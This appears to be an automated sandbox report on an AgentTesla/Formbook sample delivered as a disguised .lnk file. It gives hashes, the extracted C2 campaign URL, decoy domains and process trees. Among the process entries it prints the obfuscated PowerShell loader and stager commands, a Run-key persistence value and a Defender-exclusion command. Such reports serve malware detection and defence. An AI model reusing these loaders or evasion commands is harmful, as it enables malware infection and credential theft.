agenttesla | 4ba81036ae68eb0b4e5e5528e1109e39d9f94684de3903eb714009293a4a750c

Analysis

max time kernel
150s
max time network
132s
platform
windows10_x64
resource
win10-en-20210920
submitted
14-10-2021 12:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2145RFQ14102021.rtf.lnk
Size

5.4MB
MD5

85e44c6e99f5f4043fc2c993b6fa633b
SHA1

21b3e0a10dd9798ef71fe073cdad7cfdadbfdeae
SHA256

62fab79e945bc629c110f21c9db37c8c0cc441ad15e73c1c1349fbef986b3789
SHA512

7c2f7183d40ac7bab91fa1a572c625e38e8f7ec848d54b7a937b6a33acc5868df3af72ae3a6187e8720303ff7aa7d00e7895ff77adfd504d8b394dacb34d30ff

Score

10^/10

agenttesla formbook en keylogger persistence rat spyware stealer trojan

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

http://www.alliancefb.com/support/en/

Decoy

fortezza.tours

unicornoptical.com

freezeframegame.com

osocrossfit.com

cutass.com

zhongrisk.com

seasandoman.com

global-care-recruiting.info

whenwesaywehaveitwedo.com

mithlapainting.com

sandringhamdarlington.net

futurevalleycontracting.com

goochandhousego.pro

valentindimitrov.com

maple-events.com

yourcreditchoice.com

virginity.bid

electricindians.com

intlgcap.com

ternionathletics.com

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook

AgentTesla Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1128-249-0x000000000043785E-mapping.dmp	family_agenttesla

Formbook Payload 3 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/1380-262-0x000000000041EDA0-mapping.dmp	formbook
behavioral2/memory/1380-266-0x0000000000400000-0x000000000042E000-memory.dmp	formbook
behavioral2/memory/2212-385-0x00000000028F0000-0x000000000291E000-memory.dmp	formbook

Executes dropped EXE 8 IoCs

Processes:

WPmSHQjY348pIFB.exeePmSHQjY348pI3E.exeePmSHQjY348pI3E.exeePmSHQjY348pI3E.exeePmSHQjY348pI3E.exeePmSHQjY348pI3E.exeWPmSHQjY348pIFB.exeWPmSHQjY348pIFB.exe

pid	process
364	WPmSHQjY348pIFB.exe
360	ePmSHQjY348pI3E.exe
1288	ePmSHQjY348pI3E.exe
1264	ePmSHQjY348pI3E.exe
408	ePmSHQjY348pI3E.exe
1128	ePmSHQjY348pI3E.exe
2500	WPmSHQjY348pIFB.exe
1380	WPmSHQjY348pIFB.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

1176 rundll32.exe

pid	process
1176	rundll32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\UserPreferencesDefault = "rundll32.exe C:\\Users\\Admin\\AppData\\Roaming\\userpref.dll,main"	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

ePmSHQjY348pI3E.exeWPmSHQjY348pIFB.exeWPmSHQjY348pIFB.exeexplorer.exe

description	pid	process	target process
PID 360 set thread context of 1128	360	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 364 set thread context of 1380	364	WPmSHQjY348pIFB.exe	WPmSHQjY348pIFB.exe
PID 1380 set thread context of 3044	1380	WPmSHQjY348pIFB.exe	Explorer.EXE
PID 2212 set thread context of 3044	2212	explorer.exe	Explorer.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 29 IoCs

Processes:

powershell.exepowershell.exeePmSHQjY348pI3E.exeePmSHQjY348pI3E.exeWPmSHQjY348pIFB.exepowershell.exeWPmSHQjY348pIFB.exeexplorer.exe

pid	process
3920	powershell.exe
3920	powershell.exe
3920	powershell.exe
1652	powershell.exe
1652	powershell.exe
1652	powershell.exe
360	ePmSHQjY348pI3E.exe
360	ePmSHQjY348pI3E.exe
360	ePmSHQjY348pI3E.exe
360	ePmSHQjY348pI3E.exe
360	ePmSHQjY348pI3E.exe
360	ePmSHQjY348pI3E.exe
1128	ePmSHQjY348pI3E.exe
1128	ePmSHQjY348pI3E.exe
364	WPmSHQjY348pIFB.exe
364	WPmSHQjY348pIFB.exe
4608	powershell.exe
1380	WPmSHQjY348pIFB.exe
1380	WPmSHQjY348pIFB.exe
1380	WPmSHQjY348pIFB.exe
1380	WPmSHQjY348pIFB.exe
4608	powershell.exe
4608	powershell.exe
2212	explorer.exe
2212	explorer.exe
2212	explorer.exe
2212	explorer.exe
2212	explorer.exe
2212	explorer.exe

Suspicious behavior: MapViewOfSection 5 IoCs

Processes:

WPmSHQjY348pIFB.exeexplorer.exe

pid process

1380 WPmSHQjY348pIFB.exe
1380 WPmSHQjY348pIFB.exe
1380 WPmSHQjY348pIFB.exe
2212 explorer.exe
2212 explorer.exe

pid	process
1380	WPmSHQjY348pIFB.exe
1380	WPmSHQjY348pIFB.exe
1380	WPmSHQjY348pIFB.exe
2212	explorer.exe
2212	explorer.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

powershell.exepowershell.exeePmSHQjY348pI3E.exeePmSHQjY348pI3E.exeWPmSHQjY348pIFB.exepowershell.exeWPmSHQjY348pIFB.exeexplorer.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	3920	powershell.exe
Token: SeDebugPrivilege	1652	powershell.exe
Token: SeDebugPrivilege	360	ePmSHQjY348pI3E.exe
Token: SeDebugPrivilege	1128	ePmSHQjY348pI3E.exe
Token: SeDebugPrivilege	364	WPmSHQjY348pIFB.exe
Token: SeDebugPrivilege	4608	powershell.exe
Token: SeDebugPrivilege	1380	WPmSHQjY348pIFB.exe
Token: SeDebugPrivilege	2212	explorer.exe
Token: SeShutdownPrivilege	3044	Explorer.EXE
Token: SeCreatePagefilePrivilege	3044	Explorer.EXE

Suspicious use of WriteProcessMemory 55 IoCs

Processes:

cmd.exepowershell.execsc.execsc.exerundll32.exeePmSHQjY348pI3E.exeWPmSHQjY348pIFB.exeExplorer.EXEexplorer.exe

description	pid	process	target process
PID 3524 wrote to memory of 3920	3524	cmd.exe	powershell.exe
PID 3524 wrote to memory of 3920	3524	cmd.exe	powershell.exe
PID 3920 wrote to memory of 3028	3920	powershell.exe	csc.exe
PID 3920 wrote to memory of 3028	3920	powershell.exe	csc.exe
PID 3028 wrote to memory of 4000	3028	csc.exe	cvtres.exe
PID 3028 wrote to memory of 4000	3028	csc.exe	cvtres.exe
PID 3920 wrote to memory of 3308	3920	powershell.exe	csc.exe
PID 3920 wrote to memory of 3308	3920	powershell.exe	csc.exe
PID 3308 wrote to memory of 524	3308	csc.exe	cvtres.exe
PID 3308 wrote to memory of 524	3308	csc.exe	cvtres.exe
PID 3920 wrote to memory of 364	3920	powershell.exe	WPmSHQjY348pIFB.exe
PID 3920 wrote to memory of 364	3920	powershell.exe	WPmSHQjY348pIFB.exe
PID 3920 wrote to memory of 364	3920	powershell.exe	WPmSHQjY348pIFB.exe
PID 3920 wrote to memory of 360	3920	powershell.exe	ePmSHQjY348pI3E.exe
PID 3920 wrote to memory of 360	3920	powershell.exe	ePmSHQjY348pI3E.exe
PID 3920 wrote to memory of 360	3920	powershell.exe	ePmSHQjY348pI3E.exe
PID 3920 wrote to memory of 1176	3920	powershell.exe	rundll32.exe
PID 3920 wrote to memory of 1176	3920	powershell.exe	rundll32.exe
PID 1176 wrote to memory of 1652	1176	rundll32.exe	powershell.exe
PID 1176 wrote to memory of 1652	1176	rundll32.exe	powershell.exe
PID 360 wrote to memory of 1288	360	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 360 wrote to memory of 1288	360	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 360 wrote to memory of 1288	360	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 360 wrote to memory of 1264	360	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 360 wrote to memory of 1264	360	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 360 wrote to memory of 1264	360	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 360 wrote to memory of 408	360	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 360 wrote to memory of 408	360	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 360 wrote to memory of 408	360	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 360 wrote to memory of 1128	360	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 360 wrote to memory of 1128	360	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 360 wrote to memory of 1128	360	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 360 wrote to memory of 1128	360	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 360 wrote to memory of 1128	360	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 360 wrote to memory of 1128	360	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 360 wrote to memory of 1128	360	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 360 wrote to memory of 1128	360	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 364 wrote to memory of 4608	364	WPmSHQjY348pIFB.exe	powershell.exe
PID 364 wrote to memory of 4608	364	WPmSHQjY348pIFB.exe	powershell.exe
PID 364 wrote to memory of 4608	364	WPmSHQjY348pIFB.exe	powershell.exe
PID 364 wrote to memory of 2500	364	WPmSHQjY348pIFB.exe	WPmSHQjY348pIFB.exe
PID 364 wrote to memory of 2500	364	WPmSHQjY348pIFB.exe	WPmSHQjY348pIFB.exe
PID 364 wrote to memory of 2500	364	WPmSHQjY348pIFB.exe	WPmSHQjY348pIFB.exe
PID 364 wrote to memory of 1380	364	WPmSHQjY348pIFB.exe	WPmSHQjY348pIFB.exe
PID 364 wrote to memory of 1380	364	WPmSHQjY348pIFB.exe	WPmSHQjY348pIFB.exe
PID 364 wrote to memory of 1380	364	WPmSHQjY348pIFB.exe	WPmSHQjY348pIFB.exe
PID 364 wrote to memory of 1380	364	WPmSHQjY348pIFB.exe	WPmSHQjY348pIFB.exe
PID 364 wrote to memory of 1380	364	WPmSHQjY348pIFB.exe	WPmSHQjY348pIFB.exe
PID 364 wrote to memory of 1380	364	WPmSHQjY348pIFB.exe	WPmSHQjY348pIFB.exe
PID 3044 wrote to memory of 2212	3044	Explorer.EXE	explorer.exe
PID 3044 wrote to memory of 2212	3044	Explorer.EXE	explorer.exe
PID 3044 wrote to memory of 2212	3044	Explorer.EXE	explorer.exe
PID 2212 wrote to memory of 4456	2212	explorer.exe	cmd.exe
PID 2212 wrote to memory of 4456	2212	explorer.exe	cmd.exe
PID 2212 wrote to memory of 4456	2212	explorer.exe	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3044

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\2145RFQ14102021.rtf.lnk
2⤵
- Suspicious use of WriteProcessMemory
PID:3524

C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function mT($gL) {$mW = $Null;Get-ChildItem $gL -Recurse -Depth 1 -ErrorAction 'SilentlyContinue' | ? {$_.extension -eq '.lnk'} | % {$yq = [String](Get-Content $_.FullName);$pH = 'VXJKUHSCSOQOTVAQOTOSEHMTYRYGQZIM';$lG = $yq.IndexOf($pH);if($lG -ne -1) {$Gc = $yq.SubString($lG);$mW = $Gc.Replace($pH,'')}};return $mW};function P($z) {$G = [Text.StringBuilder]::New();for($UzG=0;$UzG -lt $z.Length;$UzG+=2){[void]$G.Append([char][int]('0x'+$z.Substring($UzG,2)))}return $G.ToString()}$mW = mT $(Get-Location).Path;if($mW -eq $Null) {$mW = mT $($env:TEMP)};$wb = [ScriptBlock]::Create((P $mW));$wb.Invoke();
3⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3920

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5xd0dn03\5xd0dn03.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:3028

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBB04.tmp" "c:\Users\Admin\AppData\Local\Temp\5xd0dn03\CSC8F0FA92E5D58435DB14960FE8949E555.TMP"
5⤵
PID:4000

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o0h2oo2p\o0h2oo2p.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:3308

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBF3A.tmp" "c:\Users\Admin\AppData\Local\Temp\o0h2oo2p\CSCE627780E19CE432D8052BACE9EF3A589.TMP"
5⤵
PID:524

C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe
"C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:364

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4608

C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe
"C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:1380

C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe
"C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe"
5⤵
- Executes dropped EXE
PID:2500

C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exe
"C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:360

C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exe
"C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exe"
5⤵
- Executes dropped EXE
PID:1288

C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exe
"C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exe"
5⤵
- Executes dropped EXE
PID:1264

C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exe
"C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exe"
5⤵
- Executes dropped EXE
PID:408

C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exe
"C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1128

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\userpref.dll,main
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1176

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $oUa = [string][char[]]@(0x66,0x75,0x6E,0x63,0x74,0x69,0x6F,0x6E,0x23,0x64,0x28,0x24,0x6C,0x29,0x23,0x7B,0x0D,0x0A,0x24,0x49,0x23,0x3D,0x23,0x5B,0x54,0x65,0x78,0x74,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x42,0x75,0x69,0x6C,0x64,0x65,0x72,0x5D,0x3A,0x3A,0x4E,0x65,0x77,0x28,0x29,0x0D,0x0A,0x66,0x6F,0x72,0x28,0x24,0x51,0x3D,0x30,0x3B,0x24,0x51,0x23,0x2D,0x6C,0x74,0x23,0x24,0x6C,0x2E,0x4C,0x65,0x6E,0x67,0x74,0x68,0x3B,0x24,0x51,0x2B,0x3D,0x32,0x29,0x7B,0x0D,0x0A,0x5B,0x76,0x6F,0x69,0x64,0x5D,0x24,0x49,0x2E,0x41,0x70,0x70,0x65,0x6E,0x64,0x28,0x5B,0x43,0x68,0x61,0x72,0x5D,0x5B,0x49,0x6E,0x74,0x5D,0x28,0x27,0x30,0x78,0x27,0x2B,0x24,0x6C,0x2E,0x53,0x75,0x62,0x73,0x74,0x72,0x69,0x6E,0x67,0x28,0x24,0x51,0x2C,0x32,0x29,0x29,0x29,0x7D,0x0D,0x0A,0x72,0x65,0x74,0x75,0x72,0x6E,0x23,0x24,0x49,0x2E,0x54,0x6F,0x53,0x74,0x72,0x69,0x6E,0x67,0x28,0x29,0x7D,0x0D,0x0A,0x66,0x75,0x6E,0x63,0x74,0x69,0x6F,0x6E,0x23,0x76,0x28,0x24,0x4F,0x29,0x23,0x7B,0x0D,0x0A,0x24,0x6C,0x23,0x3D,0x23,0x5B,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x42,0x69,0x74,0x43,0x6F,0x6E,0x76,0x65,0x72,0x74,0x65,0x72,0x5D,0x3A,0x3A,0x54,0x6F,0x53,0x74,0x72,0x69,0x6E,0x67,0x28,0x24,0x4F,0x29,0x0D,0x0A,0x24,0x6C,0x23,0x3D,0x23,0x24,0x6C,0x2E,0x72,0x65,0x70,0x6C,0x61,0x63,0x65,0x28,0x27,0x2D,0x27,0x2C,0x27,0x27,0x29,0x0D,0x0A,0x72,0x65,0x74,0x75,0x72,0x6E,0x23,0x24,0x6C,0x7D,0x0D,0x0A,0x66,0x75,0x6E,0x63,0x74,0x69,0x6F,0x6E,0x23,0x4D,0x28,0x29,0x23,0x7B,0x0D,0x0A,0x24,0x5A,0x23,0x3D,0x23,0x27,0x48,0x4B,0x43,0x55,0x3A,0x5C,0x43,0x6F,0x6E,0x74,0x72,0x6F,0x6C,0x23,0x50,0x61,0x6E,0x65,0x6C,0x5C,0x44,0x65,0x73,0x6B,0x74,0x6F,0x70,0x27,0x0D,0x0A,0x24,0x74,0x23,0x3D,0x23,0x47,0x65,0x74,0x2D,0x49,0x74,0x65,0x6D,0x50,0x72,0x6F,0x70,0x65,0x72,0x74,0x79,0x23,0x2D,0x50,0x61,0x74,0x68,0x23,0x24,0x5A,0x23,0x2D,0x4E,0x61,0x6D,0x65,0x23,0x27,0x55,0x73,0x65,0x72,0x50,0x72,0x65,0x66,0x65,0x72,0x65,0x6E,0x63,0x65,0x73,0x44,0x65,0x66,0x61,0x75,0x6C,0x74,0x27,0x23,0x2D,0x45,0x72,0x72,0x6F,0x72,0x41,0x63,0x74,0x69,0x6F,0x6E,0x23,0x53,0x69,0x6C,0x65,0x6E,0x74,0x6C,0x79,0x43,0x6F,0x6E,0x74,0x69,0x6E,0x75,0x65,0x23,0x7C,0x23,0x53,0x65,0x6C,0x65,0x63,0x74,0x2D,0x4F,0x62,0x6A,0x65,0x63,0x74,0x23,0x2D,0x45,0x78,0x70,0x61,0x6E,0x64,0x23,0x27,0x55,0x73,0x65,0x72,0x50,0x72,0x65,0x66,0x65,0x72,0x65,0x6E,0x63,0x65,0x73,0x44,0x65,0x66,0x61,0x75,0x6C,0x74,0x27,0x0D,0x0A,0x24,0x57,0x23,0x3D,0x23,0x76,0x23,0x24,0x74,0x0D,0x0A,0x24,0x70,0x23,0x3D,0x23,0x64,0x23,0x24,0x57,0x0D,0x0A,0x49,0x6E,0x76,0x6F,0x6B,0x65,0x2D,0x45,0x78,0x70,0x72,0x65,0x73,0x73,0x69,0x6F,0x6E,0x23,0x24,0x70,0x7D,0x0D,0x0A,0x4D) -replace ' ','';$FTX = [string][char[]]@(0x69,0x4E,0x56,0x4F,0x4B,0x65,0x2D,0x65,0x58,0x70,0x72,0x45,0x73,0x73,0x69,0x4F,0x4E) -replace ' ','';sal tWz $FTX;$oUa = $oUa.replace('#', ' ');tWz $oUa
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1652

C:\Windows\SysWOW64\explorer.exe
"C:\Windows\SysWOW64\explorer.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2212

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe"
3⤵
PID:4456

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
f290ff33102bc945b87b6871ce2f7cc4

SHA1
45f1664693c3d7c3b483897e69be3dac5618dd1a

SHA256
3f889f11dfa53455f75f8bad373308ba35e5016ede65b9785626322d131727a6

SHA512
f7f6e6ed9a03a5c31a904438736951698a335d508802cd9b0386e69df41671cdb9650d67d1d59aca30b3a4908d676dfb37bc7bff41f8796bef671152a5d6f57b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ePmSHQjY348pI3E.exe.log
MD5
0c2899d7c6746f42d5bbe088c777f94c

SHA1
622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1

SHA256
5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458

SHA512
ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
fd50bfec5da2ca3abdd2f32203293931

SHA1
edb50a75d0838ef12eb05f8d7dee4e551ccc65d5

SHA256
28409a6294b71f727f3b1e70c89543cfcbd0aae2de490be00fedc51d78448ae8

SHA512
fb31192b7f7179b386fb69f0867a1176a00f6e5bc7194d2490c43ffa678f5535d03222f81c82196a22c1677b6180581fcd26f384260b63a45a2bfefaad6b200d

Download Submit
C:\Users\Admin\AppData\Local\Temp\5xd0dn03\5xd0dn03.dll
MD5
e0e04d91d772c436ca0a2c971b4e8114

SHA1
f9f6951edcd17e81be0b1614691ef78bfd243b92

SHA256
1b089ca841730846a40705e6464d11171be4a7f92503f1db8ced6d2bbe465953

SHA512
9f4fe22c2a29c2636ca29a638a3c1e39685a9cb39c6ac1ef2613d191cb13c6b11deb0fbf5fc6ed7f5816b14119254fb770f84d1b43402b1f122daff1846b1319

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESBB04.tmp
MD5
066147bf25c0d6d2bcb62ca415dfa030

SHA1
5edb2899279b13da11c137bb4452dbf28ba15ab8

SHA256
819868c0703b2931789262ff997b94a8bae68f21f528ca95f80d6ab19b6d103b

SHA512
e6221ae45eb836459b4e4445241868ef058d7048c3c78b618f7cc1d9e0bc9cb4880261282dd7d9af7b39966a3d0b92b1968869e79f0b2abefc10f5be6531a207

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESBF3A.tmp
MD5
8fec20425678cc910817254cb6ab11f8

SHA1
47c416d81d985d75f78d383a21dffdfd1cc146cb

SHA256
83d0d09d1c9531f43fbbe3fb13fe8ffb5c3285f11b6bb1cca405059292de2caa

SHA512
e591ac3c2ea36082a9d1c3aaec122e06131682091a421d747cdc481322ae95a7ef4d18c0fead3b28ad64445661881d30bac37cf07f9312227f0692fd339047ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\o0h2oo2p\o0h2oo2p.dll
MD5
371fc4ffcf5f750524aad8e59794c911

SHA1
4da068137aad0b071f0605c2d019ba6db89ed9a6

SHA256
6e8b42e0f3abf50b7a4674c8b0db2437a0449dc1ad6748210a25d831992a5b44

SHA512
78c6ffd985e0b43410460765b6fb8518cd4c8d3a9e885f6cffb0341632e871a524313bd8c0ab281ffe96c4359b5052fc5b88b64b0e4759cd7b62eafc2de677f6

Download Submit
C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe
MD5
2620dc7fb3253116bacda0b5edaf27d3

SHA1
7d2d0b70770d7e7f94bcb3d38d2eeba5b25d14e3

SHA256
5c9f46bbd04381ba4acbeae46924894bf18b5982171c71c14f8e669312de01b3

SHA512
207b50bc49898aabcbe6310bd48b9ee823866891c872162d7fe229b6ebe153ab8b4ef8b86152c0120874a4ac3af13c7a4d2e6e02c38d6e4a5ae0e05c18c62148

Download Submit
C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe
MD5
2620dc7fb3253116bacda0b5edaf27d3

SHA1
7d2d0b70770d7e7f94bcb3d38d2eeba5b25d14e3

SHA256
5c9f46bbd04381ba4acbeae46924894bf18b5982171c71c14f8e669312de01b3

SHA512
207b50bc49898aabcbe6310bd48b9ee823866891c872162d7fe229b6ebe153ab8b4ef8b86152c0120874a4ac3af13c7a4d2e6e02c38d6e4a5ae0e05c18c62148

Download Submit
C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe
MD5
2620dc7fb3253116bacda0b5edaf27d3

SHA1
7d2d0b70770d7e7f94bcb3d38d2eeba5b25d14e3

SHA256
5c9f46bbd04381ba4acbeae46924894bf18b5982171c71c14f8e669312de01b3

SHA512
207b50bc49898aabcbe6310bd48b9ee823866891c872162d7fe229b6ebe153ab8b4ef8b86152c0120874a4ac3af13c7a4d2e6e02c38d6e4a5ae0e05c18c62148

Download Submit
C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe
MD5
2620dc7fb3253116bacda0b5edaf27d3

SHA1
7d2d0b70770d7e7f94bcb3d38d2eeba5b25d14e3

SHA256
5c9f46bbd04381ba4acbeae46924894bf18b5982171c71c14f8e669312de01b3

SHA512
207b50bc49898aabcbe6310bd48b9ee823866891c872162d7fe229b6ebe153ab8b4ef8b86152c0120874a4ac3af13c7a4d2e6e02c38d6e4a5ae0e05c18c62148

Download Submit
C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exe
MD5
aa5537a757a0d71658cc29410a73827e

SHA1
a4cdf6bea0b141afcf2bc2b3aeae9f9c07b23f42

SHA256
9ca64b1a5aa9526120827a68766d0e4c5d7e6b35d4729af573d88b0cf81f53ae

SHA512
81593a59e8e1503af981d034b7c21339b815c3cb58218e60219b0af2f9bf9e5f91749d546e08251ce684e2469ae7c238e72b2e84afd664d459a63ba8e277a0d1

Download Submit
C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exe
MD5
aa5537a757a0d71658cc29410a73827e

SHA1
a4cdf6bea0b141afcf2bc2b3aeae9f9c07b23f42

SHA256
9ca64b1a5aa9526120827a68766d0e4c5d7e6b35d4729af573d88b0cf81f53ae

SHA512
81593a59e8e1503af981d034b7c21339b815c3cb58218e60219b0af2f9bf9e5f91749d546e08251ce684e2469ae7c238e72b2e84afd664d459a63ba8e277a0d1

Download Submit
C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exe
MD5
aa5537a757a0d71658cc29410a73827e

SHA1
a4cdf6bea0b141afcf2bc2b3aeae9f9c07b23f42

SHA256
9ca64b1a5aa9526120827a68766d0e4c5d7e6b35d4729af573d88b0cf81f53ae

SHA512
81593a59e8e1503af981d034b7c21339b815c3cb58218e60219b0af2f9bf9e5f91749d546e08251ce684e2469ae7c238e72b2e84afd664d459a63ba8e277a0d1

Download Submit
C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exe
MD5
aa5537a757a0d71658cc29410a73827e

SHA1
a4cdf6bea0b141afcf2bc2b3aeae9f9c07b23f42

SHA256
9ca64b1a5aa9526120827a68766d0e4c5d7e6b35d4729af573d88b0cf81f53ae

SHA512
81593a59e8e1503af981d034b7c21339b815c3cb58218e60219b0af2f9bf9e5f91749d546e08251ce684e2469ae7c238e72b2e84afd664d459a63ba8e277a0d1

Download Submit
C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exe
MD5
aa5537a757a0d71658cc29410a73827e

SHA1
a4cdf6bea0b141afcf2bc2b3aeae9f9c07b23f42

SHA256
